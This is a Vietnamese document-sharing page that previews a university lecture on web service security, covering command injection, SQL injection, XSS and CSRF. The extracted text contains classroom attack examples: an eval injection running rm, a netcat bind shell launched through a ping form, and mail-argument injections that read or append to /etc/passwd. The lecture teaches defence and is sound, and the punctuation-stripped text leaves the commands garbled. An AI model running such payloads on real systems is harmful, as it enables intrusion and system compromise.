Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Sức khỏe - Y tế
Văn bản luật
Nông Lâm Ngư
Kỹ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Giới thiệu
Đăng ký
Đăng nhập
Tìm
Danh mục
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Y tế sức khỏe
Văn bản luật
Nông lâm ngư
Kĩ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Thông tin
Điều khoản sử dụng
Quy định bảo mật
Quy chế hoạt động
Chính sách bản quyền
Giới thiệu
Đăng ký
Đăng nhập
0
Trang chủ
Công Nghệ Thông Tin
An ninh - Bảo mật
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF
tailieunhanh - Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên; . Mời các bạn cùng tham khảo! | BÀI 9. AN TOÀN DỊCH VỤ WEB SQL INJECTION XSS CSRF Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 1 Nội dung Tổng quan về hoạt động của dịch vụ Web Tấn công dạng Command Injection SQL Injection XSS CSRF Quản lý phiên 2 1 1. TẤN CÔNG DẠNG COMMAND INJECTION Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 3 Command Injection Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi thực thi kịch bản servlet trên web server Không phân biệt được dữ liệu và mã nguồn trong đối số Ví dụ Website chứa servlet cung cấp tính năng tính toán biểu thức bất kỳ qua hàm eval http in _GET exp Nội dung biểu thức được truyền eval ans . in . qua đối số exp. Ví dụ http exp 1 1 Servlet thực thi như thế nào nếu truyền đối số như sau http exp 10 system rm . 4 2 Command Injection Ví dụ khác 1. http exec Client Server 2. Send page Ping for FREE Enter an IP address below Ô nhập dữ liệu 6 3 Command Injection Ví dụ khác Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 7 Command Injection Ví dụ khác ls Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 8 4 Command Injection Ví dụ khác Thực thi shell ip 26 netcat -v - e bin bash -l -p 31337 amp submit submit netcat v e bin bash l p 31337 9 Command Injection Ví dụ khác Mã PHP để gửi email email _POST email subject _POST subject system mail email s subject lt tmp joinmynetwork Chèn mã thực thi khi truyền giá trị cho đối số http email hacker@ amp subject foo lt usr passwd ls Hoặc http email hacker@ amp subject foo echo evil 0 0 root bin sh quot gt gt etc passwd ls 10 5 Phòng chống Kiểm tra chỉ chấp nhận giá trị chứa các ký tự hợp lệ Ký tự nào là hợp lệ Phụ thuộc ngữ cảnh Làm sạch đầu vào input sanitization Xác định các ký tự đặc biệt không nên xuất .
Hoài Việt
18
31
pdf
Báo lỗi
Trùng lắp nội dung
Văn hóa đồi trụy
Phản động
Bản quyền
File lỗi
Khác
Upload
Tải xuống
đang nạp các trang xem trước
Không thể tạo bản xem trước, hãy bấm tải xuống
Tải xuống
TÀI LIỆU LIÊN QUAN
Bài giảng An ninh mạng máy tính - Chương 8: Các giao thức an ninh thông dụng (ThS. Lương Minh Huấn)
57
115
5
Bài giảng An ninh mạng máy tính - Chương 1: Tổng quan về an ninh mạng máy tính (ThS. Lương Minh Huấn)
126
127
7
Đề cương bài giảng học phần An ninh mạng
6
203
3
Bài giảng An ninh mạng – Chương 1: Giới thiệu (TS Nguyễn Đại Thọ)
18
158
3
Bài giảng An ninh mạng: Chương 1 - ThS. Trần Bá Nhiệm
22
168
4
Đề cương chi tiết bài giảng An ninh mạng
6
93
4
Bài giảng An ninh mạng máy tính - Chương 7: An ninh tầng giao vận (ThS. Lương Minh Huấn)
45
102
4
Bài giảng An ninh mạng - Chương 5: Bảo đảm an toàn mạng
52
120
2
Bài giảng An toàn bảo mật mạng: Chương 1 - ThS. Trần Đắc Tốt
96
213
7
Bài giảng An toàn và an ninh mạng – Bùi Trọng Tùng
33
311
18
TÀI LIỆU XEM NHIỀU
Một Case Về Hematology (1)
8
462335
61
Giới thiệu :Lập trình mã nguồn mở
14
25879
79
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
11333
542
Câu hỏi và đáp án bài tập tình huống Quản trị học
14
10541
466
Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3
9832
108
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8884
1161
Tiểu luận: Nội dung tư tưởng Hồ Chí Minh về đạo đức
16
8497
426
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
8098
2279
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
7691
1786
Đề tài: Dự án kinh doanh thời trang quần áo nữ
17
7237
268
TỪ KHÓA LIÊN QUAN
An ninh - Bảo mật
Bài giảng An ninh mạng
An ninh mạng
Network Security
An toàn dịch vụ web
SQL injection
Quản lý phiên
Truy vấn cơ sở dữ liệu
Bài giảng An ninh mạng máy tính
An ninh mạng máy tính
Giao thức an ninh mạng
An ninh lớp ứng dụng
An ninh lớp truyền tải
An ninh lớp mạng
An ninh lớp liên kết dữ liệu
An ninh máy tính
An ninh thông tin
Phương pháp tấn công an ninh mạng
An toàn bảo mật thông tin
Đề cương bài giảng An ninh mạng
Nền tảng của an ninh mạng
Nguy cơ mất an ninh mạng
Mục tiêu an ninh mạng
Mô hình an ninh truy nhập mạng
Kiến trúc an ninh OSI
Dịch vụ an ninh
Đảm bảo an ninh thông tin
Cơ chế an ninh
Đề cương bài giảng
Lập kế hoạch an ninh mạng
An ninh tầng giao vận
An ninh tầng transport
Bảo mật tầng giao vận
Giao thức SSH
Chứng chỉ kỹ thuật số
Chương 5 Bảo đảm an toàn mạng
Bảo đảm an toàn mạng
Biện pháp đảm bảo an ninh mạng
Bài giảng An toàn bảo mật mạng
An toàn thông tin mạng
Bảo mật thông tin mạng
Nguyên tắc nền tảng của an ninh mạng
Các nguy cơ mất an ninh mạng
Các mục tiêu an ninh mạng
Lập kế hoạch an ninh mạng
Bài giảng An toàn và an ninh mạng
Cơ chế an toàn an ninh
Hệ thống tấn công thụ động
Dịch vụ an toàn an ninh
Mô hình an toàn mạng
Bảo mật mạng
Mạng thông tin
Tấn công mạng
An toàn mạng
An toàn an ninh mạng
Cơ chế an toàn bảo mật
Xây dựng hệ thống an toàn bảo mật
An toàn thông tin
Quản lý nhà nước về an ninh mạng
Kỹ thuật bảo đảm an ninh mạng
Pháp luật về an ninh mạng
Bài giảng Kỹ thuật an toàn mạng
Các vấn đề an ninh an toàn mạng
Kỹ thuật an toàn mạng
Học phần An ninh mạng
Tấn công mạng máy tính
Kỹ thuật tấn công mạng máy tính
Mô hình tấn công mạng
Kiến thức tấn công mạng
Mạng riêng ảo
Các loại mạng riêng ảo
Mạng riêng ảo truy cập từ xa
Bảo mật trong mạng riêng ảo
Hệ thống mạng
Mã hóa đối xứng
Mã hóa công khai
An toàn IP
An ninh ở mức IP
Ứng dụng IPSec
Kiến trúc an ninh IP
An toàn bảo mật
Chính sách an toàn bảo mật
Lỗ hổng an toàn bảo mật
Quản lý an toàn thông tin
Hành vi tấn công hệ thống mạng
Đối tượng tấn công mạng
An toàn bảo mật các giao thức mạng
Mạng máy tính
Tấn công giao thức TCP
Mạng TCP/IP
Liên kết dữ liệu
Bài giảng Mã hóa
Dich vụ an ninh mạng
Thiết kế hạ tầng máy tính
Bài giảng Thiết kế hạ tầng máy tính
Thiết kế an ninh
Cơ chế an ninh mạng
Module hóa thiết kế an ninh
Đảm bảo an ninh mạng
Bảo mật thông tin
Truyền thông tin trên mạng
TÀI LIỆU MỚI ĐĂNG
Giáo án mầm non chương trình đổi mới: Gia đình vui nhộn
4
390
3
22-12-2024
báo cáo hóa học:" Perceptions of rewards among volunteer caregivers of people living with AIDS working in faith-based organizations in South Africa: a qualitative study"
10
155
1
22-12-2024
BÀI GIẢNG Biến Đổi Năng Lượng Điện Cơ - TS. Hồ Phạm Huy
137
154
1
22-12-2024
báo cáo hóa học:" Quality of data collection in a large HIV observational clinic database in sub-Saharan Africa: implications for clinical research and audit of care"
7
151
4
22-12-2024
ETHICAL CODE HANDBOOK: Demonstrate your commitment to high standards
7
146
1
22-12-2024
Báo cáo nghiên cứu khoa học " Đại hội XVI thông qua điều lệ Đảng cộng sản Trung Quốc những sửa đổi bổ sung mới "
4
160
1
22-12-2024
Báo cáo lâm nghiệp: "Assessment of the effects of below-zero temperatures on photosynthesis and chlorophyll a fluorescence in leaf discs of Eucalyptus globulu"
4
137
0
22-12-2024
CÔNG NGHỆ MÔI TRƯỜNG - CHƯƠNG 5 CƠ SỞ QUÁ TRÌNH XỬ LÝ SINH HỌC
1
140
0
22-12-2024
NHÀ MẠC – NAM BẮC TRIỀU (1527-1592)_1
6
121
1
22-12-2024
NGUỒN GỐC CÂY KHOAI LANG
3
124
1
22-12-2024
TÀI LIỆU HOT
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
8098
2279
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
7691
1786
Ebook Chào con ba mẹ đã sẵn sàng
112
4404
1371
Ebook Tuyển tập đề bài và bài văn nghị luận xã hội: Phần 1
62
6267
1266
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8884
1161
Giáo trình Văn hóa kinh doanh - PGS.TS. Dương Thị Liễu
561
3833
680
Giáo trình Sinh lí học trẻ em: Phần 1 - TS Lê Thanh Vân
122
3917
609
Giáo trình Pháp luật đại cương: Phần 1 - NXB ĐH Sư Phạm
274
4695
565
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
11333
542
Bài tập nhóm quản lý dự án: Dự án xây dựng quán cafe
35
4497
490